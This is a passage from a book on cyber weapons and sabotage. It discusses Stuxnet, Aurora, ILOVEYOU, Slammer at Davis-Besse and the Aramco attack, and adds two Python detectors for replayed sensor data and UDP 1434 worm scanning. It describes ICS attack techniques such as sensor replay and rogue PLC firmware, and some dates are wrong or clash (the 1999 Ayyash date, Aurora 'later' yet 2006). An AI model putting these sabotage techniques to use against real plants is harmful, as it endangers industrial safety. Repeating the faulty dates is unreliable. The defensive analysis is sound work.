The first complication for the attackers was therefore a feasible infection strategy. Stuxnet had to be introduced into the target environment and spread there in order to reach its precise target, which was protected by an “air gap,” in not being connected to the insecure Internet and even internal networks. As a result, it is highly likely that the infection occurred through the use of a removable drive, such as a USB stick. The attack vehicle was coded in a way that allowed its handlers to connect to the worm through a command-and-control server. But because the final target was not networked, “all the functionality required to sabotage a system was embedded directly in the Stuxnet executable,” Symantec observed in the updated W32.Stuxnet Dossier, an authoritative analysis of the worm’s code. 19 The worm’s injection mechanism, at least in a later version, had an aggressive design. The number of collateral and inconsequential infections was large: by the end of 2010, the worm had infected approximately 100,000 hosts in dozens of countries, 60 per cent of which were in Iran. It is possible that the worm’s aggressive infection mechanism was intended to maximize the likelihood that it would end up on a Field PG used to program the PLCs in Natanz. Human agents may also have helped infiltrate the target, willingly as well as unwillingly. 20

A second complexity was Stuxnet’s “sabotage strategy,” in Symantec’s words. The worm specifically targeted two models of Siemens logic controllers, 6ES7-315-2 and 6ES7-417, known as code 315 and code 417. The likely targets were the K-1000-60/3000-3 steam turbine in the Bushehr nuclear power plant for code 417 and the gas centrifuges in Natanz for code 315. 21 If the worm was able to connect to such controllers, it proceeded to check their configurations in order to identify the target; if Stuxnet didn’t find the right configuration, it did nothing. But if it found what it was looking for, the worm started a sequence to inject one of three payloads. These payloads were coded to change the output frequencies of specific drivers that run motors. Stuxnet was thus set up to cause industrial processes to malfunction, physically damaging rotors, turbines, and centrifuges. The attack’s goal was to damage the centrifuges slowly, thereby tricking the plant’s operators. The rationale was probably that damaging hardware would delay Iran’s enrichment program for a significant period of time, as the requisite components cannot easily be bought on open markets.

This method relates to a third complexity, the worm’s stealthiness. Before Stuxnet started sabotaging processes, it intercepted input values from sensors, such as the state of a valve or operating temperatures, recorded these data, and then provided the legitimate controller code with prerecorded fake input signals, while the actual processes in the hidden background were manipulated. The objective was not just to fool operators in a control room, but to circumvent and compromise digital safety systems. Stuxnet also hid the modifications it made to the controller code. And even before launching a payload, Stuxnet operated stealthily: it had mechanisms to evade anti-virus software, it was able to hide copies of its files on removable drives and hide its own program blocks when an enumeration was enforced on a controller, and it erased itself from machines that did not lead to the target.
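The replay of prerecorded sensor values, described in this paragraph and in the chapter’s opening summary of Stuxnet, leaves a trace that a plant’s monitoring side can look for. The following Python example is added here as an illustration and is not Stuxnet’s code, nor any vendor’s product: it builds a constructed stream of noisy process readings, appends a replayed copy of an earlier recording, and flags the replay on the grounds that a noisy physical process essentially never repeats an earlier stretch of readings value for value. The window size and the frozen-value check are assumptions chosen for the example.

```python
"""Spotting replayed sensor input of the kind the text describes.

Stuxnet recorded genuine sensor values and later fed that recording back to
the controller while the real process was being manipulated.  Readings from
a noisy physical process essentially never repeat an earlier window value
for value, so a long exact repeat of an earlier window is a strong replay
indicator; a window with no variation at all points to a frozen input.
Everything here is constructed for illustration; it is not Stuxnet's code
and not a vendor product.
"""
from __future__ import annotations

import random
from typing import Dict, List, Optional, Tuple


def generate_live_readings(n: int, base: float, noise: float, seed: int) -> List[float]:
    """Simulate a process variable such as a temperature: base value plus
    Gaussian noise, rounded to two decimals as a PLC might quantize it
    (constructed data, deterministic for a given seed)."""
    rng = random.Random(seed)
    return [round(base + rng.gauss(0.0, noise), 2) for _ in range(n)]


def build_replayed_stream(seed: int = 7) -> Tuple[List[float], int, int]:
    """Constructed scenario: 100 live readings, then the attacker replays the
    recording it made of readings 10..39.  Returns the stream plus the
    indices (replay_start, recording_start) a detector should recover."""
    live = generate_live_readings(100, 80.0, 0.5, seed)
    recording = live[10:40]          # what the attacker captured earlier
    return live + recording, 100, 10


def find_replay(readings: List[float], window: int = 20) -> Optional[Tuple[int, int]]:
    """Return (replay_start, original_start) for the first window of `window`
    consecutive readings that exactly repeats an earlier window, else None.
    Each window is keyed as a tuple, so the scan is one pass over the stream."""
    first_seen: Dict[Tuple[float, ...], int] = {}
    for i in range(len(readings) - window + 1):
        key = tuple(readings[i : i + window])
        if key in first_seen:
            return i, first_seen[key]
        first_seen[key] = i
    return None


def find_frozen(readings: List[float], window: int = 20) -> Optional[int]:
    """Return the start index of the first window in which the value never
    changes (a stuck sensor or a fabricated constant input), else None."""
    for i in range(len(readings) - window + 1):
        chunk = readings[i : i + window]
        if max(chunk) == min(chunk):
            return i
    return None


if __name__ == "__main__":
    stream, replay_at, recorded_from = build_replayed_stream()
    print("replay detected at", find_replay(stream), "expected", (replay_at, recorded_from))
    print("frozen window in live data:", find_frozen(stream[:100]))
```

In practice the comparison would run on the values the controller actually consumes, next to an independent measurement path (the analogue or out-of-band readings this chapter later credits with limiting the Davis-Besse incident), because a replay that is fed to the controller is invisible to anything that only reads the controller’s own inputs.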

The resources and investment that went into Stuxnet could only be mustered by a “cyber superpower,” argued Ralph Langner, a German control system security consultant who first extracted and decompiled the attack code. 22 The Obama administration later admitted that it co-developed the sabotage malware together with Israeli experts in computer attacks. The operation’s first challenge was getting the intelligence right. Each single control system is a unique configuration, so the attackers needed superb information about the specific system’s schematics. “They probably even knew the shoe size of the operators,” said Langner. The designs of the target system were probably stolen or even exfiltrated from Iran by an earlier piece of espionage software related to the final Stuxnet, known as the beacon. Another aspect is the threat’s design itself: the code was so specific that it is likely that the attackers had to set up a mirrored environment to refine their attack vehicle, which could have included a mock enrichment facility. 23 Stuxnet also had network infection routines; it was equipped with peer-to-peer update mechanisms that seem to have been capable of communicating even with infected equipment without an Internet connection, and injecting code into industrial control systems while hiding the code from the operator. Programming such a complex agent required time, resources, and an entire team of core developers as well as quality assurance and management. 24 The threat also combined expensive and hard-to-get items: four zero-day exploits (i.e. previously unknown and hence highly valuable vulnerabilities); two stolen digital certificates; a Windows rootkit (software granting hidden privileged access); and even the first-ever Programmable Logic Controller rootkit. 25 For the time being it remains unclear how successful the Stuxnet attack against Iran’s nuclear program actually was. But it is clear that the operation has taken computer sabotage to an entirely new level.

Stuxnet is also noteworthy in several other respects. One observation concerns the high amount of intelligence programmed into the weapon itself. The attack vehicle was coded in a way that allowed its handlers in Washington to connect to the worm through a command-and-control server. But because the final target was not networked, “all the functionality required to sabotage a system was embedded directly in the Stuxnet executable,” Symantec observed in the W32.Stuxnet Dossier. 26 Another observation is that it did not create collateral damage. Cyber weapons with aggressive infection strategies built in, a popular argument goes, are bound to create uncontrollable collateral damage. 27 The underlying image is that of a virus escaping from the lab to cause an unwanted pandemic. But this comparison is misleading. Stuxnet infected a very large number of hosts—but the worm did not create any damage on these computers. In the known cases of sophisticated cyber weapons, collateral infections did not mean inadvertent collateral damage.

Another illustrative demonstration of a cyber weapon took place a few years later “on range.” On range means that it happened in a testing and training environment. In an experiment in 2006, the Idaho National Laboratory tested the so-called “Aurora” vulnerability that left some North American power stations exposed to electronic attack. The test target was a $1m, 27-ton industrial diesel generator. The goal: permanently disabling the enormous machine in a controlled environment through an Internet-based cyber attack from 100 miles away. In the test, the generator started shuddering, shaking, and smoke came puffing out, ultimately disabling the green machine. The lab reportedly came up with twenty-one lines of code that “caused the generator to blow up.” 28 The malicious code caused the machine’s circuit breakers to cycle on-and-off in rapid succession, causing permanent damage through vibration. 29

The line between what is a cyber weapon and what is not a cyber weapon is subtle. But drawing this line is extraordinarily important. For one it has security consequences: if a tool has no potential to be used as a weapon and to do harm to one or many, it is simply less dangerous. Secondly, drawing this line has political consequences: an unarmed intrusion is politically less explosive than an armed one that has the potential to damage buildings and injure and kill people. Thirdly, the line has legal consequences: identifying something as a weapon means, at least in principle, that it may be outlawed and its development, possession, or use made punishable. It follows that the line between a weapon and non-weapon is conceptually significant: identifying something as not a weapon is an important first step towards properly understanding the problem at hand and to developing appropriate responses. The most common and probably the most costly form of cyber attack aims to spy. But even a highly sophisticated piece of malware that is developed and used for the sole purpose of covertly exfiltrating data from a network or machine is not a weapon. Consequently, the law of armed conflict does not deem espionage an armed attack. Three noteworthy cases that may be confused with cyber weapons help make the concept more precise.

The first example of what does not constitute a cyber weapon is the weaponization of gadgets, rather than code. Technically sophisticated operations are well known in the world of espionage, for instance tiny listening bugs or exploding pens and cigars. Such cases figure more prominently in fiction than in reality, but occasionally they do happen. One of the best-known James Bond-style examples is the assassination of Yahya Abd-al-Latif Ayyash, aka “the engineer.” Ayyash, an important bomb-maker for Hamas and Islamic Jihad, built the improvised explosive devices used in numerous suicide bombings and terrorist attacks. He had been one of Israel’s most-wanted enemies. On 5 January 1999, the Shin Bet, Israel’s domestic intelligence service, assassinated him by placing 15 grams of RDX, an explosive nitroamine, into the cellphone of one of Ayyash’s trusted friends. Israeli agents tricked that friend’s uncle and his wife, who unknowingly helped place the deadly phone at the engineer’s ear, assuming they would help the Israelis eavesdrop on Ayyash, not execute him. 30

Lesser known is the fact that Hezbollah had pulled off a similar if less sophisticated stunt in the same year, penetrating one of the IDF’s most secretive and technologically sophisticated entities, Unit 8200, which allegedly helped to build Stuxnet a decade later. In early 1999, a Hezbollah cellphone with a depleted battery was found in a raid in Southern Lebanon. A military intelligence officer turned over the device to the signal intelligence unit and it was brought to the headquarters of Unit 8200 close to Glilot junction north of Tel Aviv. When two officers tried to connect the device to an appropriate charger, it detonated, severely injuring both. One lost his hand. 31 Previously harmless devices may indeed be turned into deadly weapons by secretly (or overtly) adding explosives or other harmful functions. But such militant gadgetry belongs more to the category of improvised explosive devices, IEDs, than to that of weaponized code.
The second non-weapon discussed here is intellectually more interesting: the ILOVEYOU worm, perhaps the most costly generic intrusion to date. On 4 May 2000, a new malware rapidly spread by exploiting a generic scripting engine. A 24-year-old undergraduate student in the Philippines, Onel De Guzman, had programmed the worm. Originating in Manila, it spread across the globe in one day, infecting around 45 million Windows PCs. The worm spread by sending emails to entire address books, thus pretending to be a love letter from a known and trusted person. The “Love Bug,” as the media called the worm, was capable of overwriting audio and picture files, replacing them with malicious code. In Britain, 30 per cent of all email servers in private companies were brought down by the volume of requests. The estimated worldwide damage exceeded $10bn. Among the infected targets were governments and defense establishments. Britain’s House of Commons saw its internal communication system immobilized. The virus infected four classified internal systems in the Pentagon, according to Kenneth Bacon, then the DoD spokesperson, 32 and it was also found on around a dozen CIA computers. 33 ILOVEYOU, it is very important to note, did not exfiltrate any data to external servers. The small software did not even have a command-and-control infrastructure, but was acting in a primitively autonomous way. Yet there are instances when such generic pieces of malware could lead to physical damage. This almost happened in early 2003 in Ohio.

A third example that may be mistaken for a cyber weapon is the so-called Slammer Worm. On 25 January 2003, this highly effective worm led to a so-far unique incident at the Davis-Besse nuclear power plant in Oak Harbor, Ohio, about 80 miles west of Cleveland. The plant operated a single light water reactor. Ten months earlier, in March 2002, the station had already suffered one of America’s most serious nuclear safety incidents, this one entirely unrelated to a computer flaw. Maintenance workers had discovered that borated water which had leaked from a cracked rod had eaten a football-sized hole into the reactor head. As a result, the reactor was shut down for repair works that took two years. So Davis-Besse was offline when the Slammer worm hit. The Slammer worm entered the plant through an unnamed contractor, via a simple T1 telephone line that connected the contractor’s computers to the business network of FirstEnergy, the utility company that operated the plant. This T1 line, according to a later investigation, bypassed the plant’s firewall. Dale Wuokko of FirstEnergy explained the bypassed firewall to the Nuclear Regulatory Commission after the incident: “This is in essence a backdoor from the Internet to the Corporate internal network that was not monitored by Corporate personnel,” Wuokko wrote, “some people in Corporate’s Network Services department were aware of this T1 connection and some were not.”

SQL Slammer, as the worm is known, started to spread like an Internet wildfire on the early morning of Saturday, 25 January 2003, at 05:30 Greenwich Mean Time. The worm exploited a buffer overflow flaw in a widely used Microsoft SQL server. The small piece of code generates random IP addresses and then copies itself to those addresses. If the program gets lucky, and one of these addresses leads to a host that happens to be running an unpatched version of Microsoft’s SQL Server, then this machine becomes infected and begins randomly spraying the web with more worms. The vulnerability used by the worm had in fact been known for half a year, and Microsoft had made a security update available six months before Slammer went viral—and to Microsoft’s credit even before the vulnerability became public. But not everybody had installed the patch, including many at Microsoft and, as it turned out, the operators at Davis-Besse. In fact the plant operators didn’t even know there was a patch for the vulnerability.

CYBER WAR WILL NOT TAKE PLACE

A few things are noteworthy about Slammer. The worm itself was tiny; its code had a mere 376 bytes and fitted inside a single Internet packet (this means the worm’s code was smaller than an empty email without any text and subject line). Additionally, the worm used a specific Internet protocol that allows a computer to send a message to another computer without requiring prior communications to set up special transmission channels, other than email or browser data. An attack consisted of a single packet sent to UDP port 1434. The worm was therefore able to broadcast scans without the need for a prior response from its potential victims. This meant that each infected host blasted out single yet effective “fire-and-forget” packets that contained the worm. An infected machine with a normal Internet connection speed of 100-Mbps could realistically produce 26,000 scans per second. As a result, Slammer was the fastest worm in the history of computing. 34 When Slammer’s rapid spread slowed down Internet traffic globally that morning, many computers lost all legitimate traffic yet they were still able to send and receive the worm because it was so small and so versatile. Analysis estimated that the worm infected more than 75,000 hosts, spraying the Internet with scans from each of those. The resulting slowdown caused computer network outages, cancelled airline flights, failures in ATM machines, and even interference with elections. 35 Davis-Besse’s corporate network was affected by that global flood of confused packets and slowed down as well. The plant’s business network, it soon turned out, was connected to the plant’s industrial control network, which is not supposed to be the case (such connections make it easier for the plant’s operators to access real-time data, but ideally these connections should be read-only). At 16:00 local time, the operators of the power plant itself noticed that the network was slowing down. Fifty minutes later, the Safety Parameter Display Unit System crashed. This system is designed to monitor a plant’s safety indicators, such as coolant systems, core temperatures, and external radiation sensors. 36 Twenty-three minutes later, at 17:13, the less critical Plant Process Computer also crashed. Both systems, it should be noted, had analogue backups in place which were not affected by the rummaging worm. 37 After six hours the plant’s engineers had reinstated both systems.
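The propagation pattern described above (one small UDP datagram to port 1434 per randomly chosen address, with no prior exchange) is easy to recognize from the defender’s side in network flow records: a single source reaching an unusually large number of distinct destinations, one packet each, all on the same port. The Python example below is added here to show that check; it is not from the book, not Slammer’s code, and not any product’s detector. The flow-record format, the hosts, and the thresholds are all constructed for the example, and the 404-byte flow size is simply the 376-byte worm plus 28 bytes of IP and UDP headers.

```python
"""Flagging Slammer-style single-packet UDP scanning in flow records.

Each infected host sent one small UDP datagram to port 1434 at a random
address, with no prior exchange.  In flow logs that leaves a distinctive
shape: one source, very many distinct destinations, a single packet to each,
all on the same port.  The record format, hosts and thresholds below are
constructed for this example, not taken from any real collector or product.
"""
from __future__ import annotations

import random
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# One flow per line: timestamp, src:port -> dst:port, protocol, packets, bytes.
# The format is invented for this example.
FLOW_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"(?P<proto>\w+) (?P<pkts>\d+)pkt (?P<bytes>\d+)B$"
)


def constructed_flows(seed: int = 2003) -> List[str]:
    """Build a small constructed flow log: ordinary traffic plus one host
    spraying single UDP datagrams at port 1434 on random addresses."""
    rng = random.Random(seed)
    lines: List[str] = []
    # A workstation browsing two web servers (multi-packet TCP sessions).
    for i in range(6):
        lines.append(f"2003-01-25T05:30:{i:02d}Z 10.0.0.21:{40000 + i} -> "
                     f"192.0.2.{10 + i % 2}:80 tcp 37pkt 21504B")
    # A legitimate SQL client that repeatedly talks to two database servers
    # on UDP 1434: same port, but few targets and multi-packet exchanges.
    for i in range(8):
        lines.append(f"2003-01-25T05:30:{i:02d}Z 10.0.0.33:{41000 + i} -> "
                     f"10.0.1.{5 + i % 2}:1434 udp 4pkt 1216B")
    # The infected host: one 404-byte datagram (376-byte worm + 28 bytes of
    # IP/UDP headers) to each of 60 random addresses.
    for i in range(60):
        dst = ".".join(str(rng.randrange(1, 255)) for _ in range(4))
        lines.append(f"2003-01-25T05:31:{i % 60:02d}Z 10.0.0.5:{rng.randrange(1024, 65535)} -> "
                     f"{dst}:1434 udp 1pkt 404B")
    rng.shuffle(lines)
    return lines


def find_scanners(lines: Iterable[str], port: int = 1434, min_targets: int = 25,
                  min_single_packet_ratio: float = 0.9) -> Dict[str, dict]:
    """Return {source: stats} for sources whose UDP traffic to `port` reaches
    at least `min_targets` distinct destinations and consists almost entirely
    of one-packet flows.  Lines that do not parse are skipped."""
    per_src: Dict[str, dict] = defaultdict(lambda: {"targets": set(), "flows": 0, "single": 0})
    for line in lines:
        m = FLOW_RE.match(line.strip())
        if not m or m["proto"] != "udp" or int(m["dport"]) != port:
            continue
        stats = per_src[m["src"]]
        stats["targets"].add(m["dst"])
        stats["flows"] += 1
        if int(m["pkts"]) == 1:
            stats["single"] += 1
    flagged: Dict[str, dict] = {}
    for src, stats in per_src.items():
        ratio = stats["single"] / stats["flows"]
        if len(stats["targets"]) >= min_targets and ratio >= min_single_packet_ratio:
            flagged[src] = {
                "distinct_targets": len(stats["targets"]),
                "flows": stats["flows"],
                "single_packet_ratio": round(ratio, 3),
            }
    return flagged


if __name__ == "__main__":
    for src, stats in find_scanners(constructed_flows()).items():
        print(f"{src}: {stats}")
```

The fan-out count, not the port alone, is what separates the worm from the legitimate SQL client in the constructed log: both use UDP 1434, but only the infected host touches dozens of addresses with exactly one packet each. On a real collector the same logic would run per time window, since Slammer’s rate (tens of thousands of scans per second per host, as the text notes) makes the pattern visible within seconds.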

Three things should be noted about the Davis-Besse incident. First, Slammer’s nuclear attack was concerning, but it was a miss: even if Davis-Besse had not been “in a safely defueled condition,” as the NRC’s chairman said in response to a concerned letter from a congressman, the backup systems would likely have prevented a more serious incident. 38 Second, Slammer was the precise opposite of a targeted attack. The worm’s impact on Davis-Besse was entirely random, and partly the result of bad systems administration at the nuclear plant. Predicting and planning with such a unique set of coincidences would be a significant challenge for an attacker focused on a specific target or set of targets. Yet, thirdly, it should also be noted that the incident, despite these limitations, demonstrates the real risk of a catastrophic cyber attack, even the risk of an accidental cyber attack of major proportions.

So far this chapter has discussed a number of different cyber attacks, 
including targeted ones like Stuxnet and generic ones like Slammer. 
These cases bring to light a conceptual tension between highly generic 
and untargeted malware and highly specific and targeted malware. At 
closer examination, this tension gives rise to three problems that are 
probably unique to the offensive use of cyber weapons. 

The first problem will be called the problem of generics here. The generic-specific tension probably has no useful equivalent in the conventional use of force. On one end of the spectrum is the highly targeted use of force, for instance by a sniper: there’s only one target, one bullet, either hit or miss. On the other end of the spectrum is a highly infectious and virulent biological agent: once released, the killer virus may spread beyond the initial attacker’s and anybody else’s control. These comparisons are highly imperfect. But they help illustrate the problem of generics for architects of cyber weapons. In most if not all circumstances, those seeking to deploy code for political purposes would want to avoid both extremes: developing a weapon that is so specific that it may only be able to hit one specific target system. Such a one-off attack is impossible to repeat, thus limiting its threatening utility. Alternatively they would want to avoid developing a weapon that is so generic that it could spin out of control once released, threatening to create uncontrollable collateral damage. Based on the available empirical evidence, the first scenario is significantly more realistic than the second one. Yet the risks need to be properly understood.

Computer security experts of various strains do not necessarily have a good understanding of the full potential of generic intrusions. This lack of such knowledge arises from the complexity and uniqueness of most computer installations, with a bespoke mix of hardware types, networks, and software systems, including in most cases software applications that can be many years old, so-called “legacy systems.” Components of these large-scale systems may be updated and exchanged on a case-by-case basis, so that the larger system and its processes are continually changing. Different parts of such a complex system may be owned, designed, operated, maintained, and administered by different organizations. This dynamic applies to modern commercial, governmental, and military installations. In fact the problem is so large that it has become a subject for research in computer science. American and European governments and other funders have sponsored research on large-scale complex IT systems. Industrial control systems fall into this category. In SCADA networks and their programmable field devices, attack vectors and configurations tend to be rather specific, so that a widely generic attack seems to be unlikely.

Yet the problem of generics remains empirically unexplored. Dale Peterson, one of the world’s leading SCADA security experts, has distinguished three types of attack against industrial control systems: simple attacks that merely crash systems or interrupt their correct operation, for instance by exploiting a widespread lack of authentication in those systems; moderate attacks where attackers have intelligence on a process and learn how to damage a physical component or subsystem; and complex attacks, where attackers modify a process in a stealthy manner over an extended period of time. Simple attacks require less process intelligence than a complex attack. To illustrate the point, Peterson offers an example of how rogue firmware could be loaded onto the Rockwell Automation ControlLogix PLC:

An attacker could develop and load a set of actions into the rogue firmware which could reboot the PLC, report a percentage of wrong values, issue random write commands, etc. The rogue firmware would use a pseudo-random number generator to select both the type and timing of a series of attacks, producing intermittent PLC failures. The rogue firmware could also easily be spread with a worm, making for a variety of intermittent failures across all PLCs that would be very difficult to diagnose. This is a simple attack that would require little process knowledge. 39

Simple generic attacks against a specific set of machine configurations are possible, at least in theory. The 64,000-dollar question is where the limits are of generic higher-order attacks. Stuxnet, the most sophisticated attack on record, was extremely specific and highly targeted—the worm’s collateral infections on seemingly random machines did not have any real consequences for the owners and users of those computers. But it is unclear whether the next generation of high-powered cyber weapons will be equally specific in design, although this will probably be the case. The future will likely bring the answer, either through experience or through research.

The second unique and difficult problem of cyber weapons is the problem of intentionality. This problem arises in unexpected ways in the context of weaponized code. The core question is when a specific attack on a specific target ceases to be—or begins to be—an instrument of a specific attacker. To answer this question, the notion of a “cyber attack” requires clarification. Cyber attack includes both non-violent events, like denial of service attacks or indeed most malware incidents that illegitimately affect a computer or a network of computers, and those attacks that can cause a violent outcome. Even (and especially) relatively short and simple malware, like the SQL Slammer worm, may propagate itself and reach targets in a generic rather than in a specific fashion. Malware, simply put, may identify potential hosts through generic scans, propagate itself through built-in infection mechanisms, infiltrate a new host, execute itself on that host (or get executed by an unknowing user), and then repeat this cycle. Such malware qualifies, in the language of agent theory, as an autonomous agent. 40 Autonomous agents act autonomously. The actions of such autonomous agents can therefore be seen as a form of attack, not merely as an accident.

But the autonomy of software agents has a problematic flipside. The Slammer Worm could indeed be compared to a biological virus, or even to a wildfire: once the worm began to spread on its own, it was literally out of control in the sense that the software was not, like other more sophisticated malware, at the leash of a command-and-control server. Even its author could not stop or contain it any longer. It spread randomly. But weapons are instruments of harm. If the author of an attack is unable to control the instrument of harm, then the tool’s instrumentality gets progressively lost. Instrumentality means shaping an opponent’s or a victim’s behavior—but if the attacker has lost the ability to react to an opponent’s change of behavior by adapting the use of the instrument, for instance by increasing the level of pain or by ceasing an attack, then it would be irrational for the opponent to attempt such a moderating change of behavior. It is therefore necessary to distinguish between a violent cyber attack and a cyber weapon—to qualify as a cyber attack, an incident does not necessarily have to be intentional and instrumental. ILOVEYOU’s effects on the CIA and SQL Slammer’s effects on Davis-Besse may qualify as cyber attacks: but although such incidents could in theory have violent effects, they have lost their instrumental character. As a result, they cannot be regarded as cyber weapons.

Taken together, the problem of generics and the problem of intentionality lead to a third problem: the problem of learning agents. Stuxnet is noteworthy for something it didn’t do. Stuxnet was an intelligent agent, able to make simple decisions based on environmental data, but it was not a learning intelligent agent. One confidential study by America’s national laboratories estimated that the worm set Iran’s nuclear program back by one to two years. “There were a lot of mistakes made the first time,” one senior US official was quoted as saying in The New York Times. “This was a first generation product. Think of Edison’s initial lightbulbs, or the Apple II.” 41 A next generation product could be able to learn. Learning software agents and machine learning generally have been the focus of much research attention and funding in computer science of the past decade. The defense and intelligence establishments in the United States, Britain, and Israel have traditionally been well ahead of general trends in computer science research, for instance in cryptography or distributed systems. It would be surprising if an intelligent coded weapon capable of learning had not yet been developed. A learning weapon could be able to observe and evaluate the specifics of an isolated environment autonomously, analyze available courses of action, and then take action. By doing so, learning malicious software agents would redefine both the problem of generics and the problem of intentionality in entirely unprecedented ways.
SABOTAGE


The world economy depends on energy. The most essential source of energy is oil and the world’s biggest source of oil is Saudi Arabia. The bulk of the country’s oil production is in the hands of its national oil company, Saudi Aramco. On 15 August 2012, this pivotal corporate behemoth with a workforce of about 54,000 people became the target of a cyber attack that knocked out 30,000 of its workstations, about three-quarters of the total, turning their Microsoft Windows machines into bricks that could not even be booted up. 1

The attack could have been disastrous. The company has the largest 
proven crude reserves and produces more units of oil than anybody else, 
pumping 9.1 million barrels a day during 2011, 15 per cent more than 
the year before. It manages more than 100 oil and gas fields, including 
Ghawar Field, the world’s largest oil field. The firm’s reach is global. Its 
operations include exploration, drilling, producing, refining, distributing,
and marketing oil, gas, petroleum, and other petrochemicals. Saudi
Aramco is headquartered in Dhahran, a small city in Saudi Arabia’s 
Eastern Province; the Kingdom of Bahrain is a 20-mile driving distance 
to the west. This geographical location contains a clue to the alleged 
motivation of the cyber attack that hit on 15 August, just when many 
employees were about to go on leave for Eid ul-Fitr, the Muslim holiday
that marks the end of Ramadan. A targeted computer virus managed to
penetrate the company’s business network and, once inside, rapidly
spread through shared network connections. The malware’s main function
was deleting data and making the infected Windows computer
unbootable by overwriting the machine’s Master Boot Record files.
Saudi Aramco instantly put out word that its core operations, oil exploration,
production, and refinement were not affected by the attack.

Wider operations could easily have been affected. The computer systems
that control plant operations and oil production on the company’s
oil and gas fields may have been isolated from the Internet, as Saudi
Aramco claimed they were. In any case, the virus used for the attack was
incapable of harming any of the systems that commonly run on Industrial
Control Systems. Such SCADA systems, which control valves and
pumps in remote oil installations, are not well defended and present
rather easy targets for skilled attackers. So a more sophisticated attack
could well have affected oil production. But even without directly affecting
field operations—one must assume that almost all other business
operations took a hard hit for two chaotic weeks, including general 
administration, human resources, customer support, marketing, etc.— 
the hours after the attack were “critical” and a “humongous challenge,” 
in the words of one company insider. 2 Some of the company’s websites 
remained offline for more than a week. Emails bounced back. Engineers 
feared a follow-on attack. In the end Saudi Aramco managed to put its 
network back online only on Saturday, 31 August, more than ten days 
after the initial attack. 

The Aramco attack raises a number of intriguing conceptual questions.
The attack was not violent, and it did not have a direct potential
to be violent, as the more detailed analysis below will show. Yet the
attackers managed to damage Saudi Aramco’s good reputation and significantly
disrupted its day-to-day business operations. Was the attack an
act of sabotage? What is sabotage in general terms, and what is its 
purpose? Does sabotage have to be violent or potentially violent? And 
what is the potential of sabotage in future cyber attacks? 

This chapter argues that malicious software and cyber attacks are ideal 
instruments of sabotage. Cyber attacks which are designed to sabotage 
a system may be violent or, in the vast majority of cases, non-violent. 
The higher the technical development and the dependency of a society 
on technology (including public administration, the security sector, and 
industry), the higher the potential for both violent and non-violent 
sabotage, especially cyber-enabled sabotage. This has a seemingly contradictory
effect: the higher the number of activists or adversaries that
choose computer sabotage over physical sabotage, the easier it will be to 
distinguish between violence and non-violence, and the more likely it is 
that saboteurs choose non-violence over violence. 

The argument is unveiled in four stages. The first section will define 
the nature of sabotage and highlight what remains unaffected by the rise 
of cyber attacks. The second section will illustrate the historically deep-rooted
tension between disablement and destruction, and introduce
what is affected by the rise of cyber attacks. The chapter then discusses 
the details of a few high-profile computer-sabotage examples. It closes 
with some considerations on the new vulnerabilities of industrial control 
systems that are likely to affect the future of sabotage. 

Sabotage is the deliberate attempt to weaken or disable an economic 
or military system. All sabotage is predominantly technical in nature, but 
it may of course use social enablers. The means used in sabotage may not 
always lead to physical destruction and overt violence. Sabotage may be 
designed merely to disable machines or production processes temporarily,
and explicitly to avoid damaging anything in a violent way. If violence
is used, things are the prime targets, not humans, even if the ultimate
objective may be to change the cost-benefit calculus of decision-makers.
Sabotage tends to be tactical in nature and will only rarely have operational
or even strategic effects. Sabotage on its own may not qualify as
an armed attack because the saboteurs may deliberately avoid open
violence, they may avoid political attribution, but they always aim to be
instrumental. Both avoiding excessive violence and avoiding identification
may serve the ultimate goal of sabotage: impairing a technical system.
Sabotage is therefore an indirect form of attack. The ultimate target
of all political violence is the mind of human decision-makers, as a
previous chapter has argued. Political violence against humans is designed
to affect decision-makers, for instance by grabbing as much public
visibility as possible. Sabotage, in contrast to the use of guns and explosives
(or cyber weapons), is not ultimately focused on the human body
as a vehicle to the human mind—instead, sabotage, first and foremost, 
attempts to impair a technical or commercial system and to achieve a 
particular effect by means of damaging that system. 

The core ideas of sabotage have barely changed in the past century, 
despite the advent of sabotage by cyber attack. Looking back seventy 
years will illustrate this continuity. In 1944, the United States Office of
Strategic Services, the CIA’s precursor organization, issued the Simple
Sabotage Field Manual, and stamped it secret. The document was declassified
in 1963. It set out in great detail how to slow down the Axis
powers. The manual was mainly written as a guide to help recruit insiders
working for the Axis powers who did not support the Nazis and
Fascists and wanted to sabotage the war effort from within. The manual
was hands-on, and recommended how to use salt, nails, candles, and
pebbles as weapons, or how to slow down an organization by making
meetings and bureaucratic procedures as inefficient and faulty as possible.
But the manual also contained a short paragraph on the idea itself,
which may help clarify the notion of sabotage held by the US intelligence
community:

Sabotage varies from highly technical coup de main acts that require detailed
planning and the use of specially trained operatives, to innumerable
simple acts which the ordinary individual citizen-saboteur can perform.

... Simple sabotage does not require specially prepared tools or equipment;
it is executed by an ordinary citizen who may or may not act individually
and without the necessity for active connection with an organized
group; and it is carried out in such a way as to involve a minimum danger
of injury, detection, and reprisal. 3

All four of the main features contained in the manual and this key 
paragraph still hold true in the context of twenty-first-century cyber 
attacks: online sabotage, firstly, still ranges from highly technical, planned,
and skill-intensive operations on the one end of the spectrum to
manifold simple acts that citizen-saboteurs can perform. Computer
sabotage, secondly, may be executed by organized groups and even agencies
representing states, or such attacks may be designed and executed
by single individuals. Software attacks with the goal of sabotaging a
system, thirdly, are still mostly carried out in ways that involve minimum
danger of detection, attribution, and reprisal. And finally it is still
uniquely skilled insiders who are the potentially most devastating enablers
of sabotage, either acting on their own or as representatives of
outside adversaries. These four dimensions of continuity raise the question
of how sabotage has changed in the digital age.

A brief look at the concept’s origins greatly helps to understand some 
of today’s novel features. The word sabotage has a controversial history. 
Its origins date back to the heyday of industrialization in the nineteenth 
century, when workers rebelled against dire conditions in mechanized 
factories. Emile Pouget, a French anarchist active at the turn of the
twentieth century, promoted sabotage in pamphlets and other publications.
A sabot is a simple shoe, hollowed out from a single block of soft
wood, traditionally worn by Breton peasants, and today one of the main
tourist souvenirs in the Netherlands. The symbol of the wooden shoe
goes back to the urban myth of French workmen throwing their wooden
shoes into finely tuned moving machinery parts to clog them up. That
metaphorical use of “sabotage,” Pouget wrote in 1910, had already been
around in street slang for decades. “Comme à coups de sabots,” as if hit
with wooden shoes, stood for working intentionally clumsily, slowly,
without thought and skill, thus slowing down or halting the process of
production. 4 The expression soon became more widespread and its
metaphorical origins were forgotten, especially in cultures that didn’t
know the sabot. An equivalent in American English is “monkeywrenching,”
which refers to the comparable practice of throwing a heavy
adjustable wrench into the gears of industrial machinery to damage it
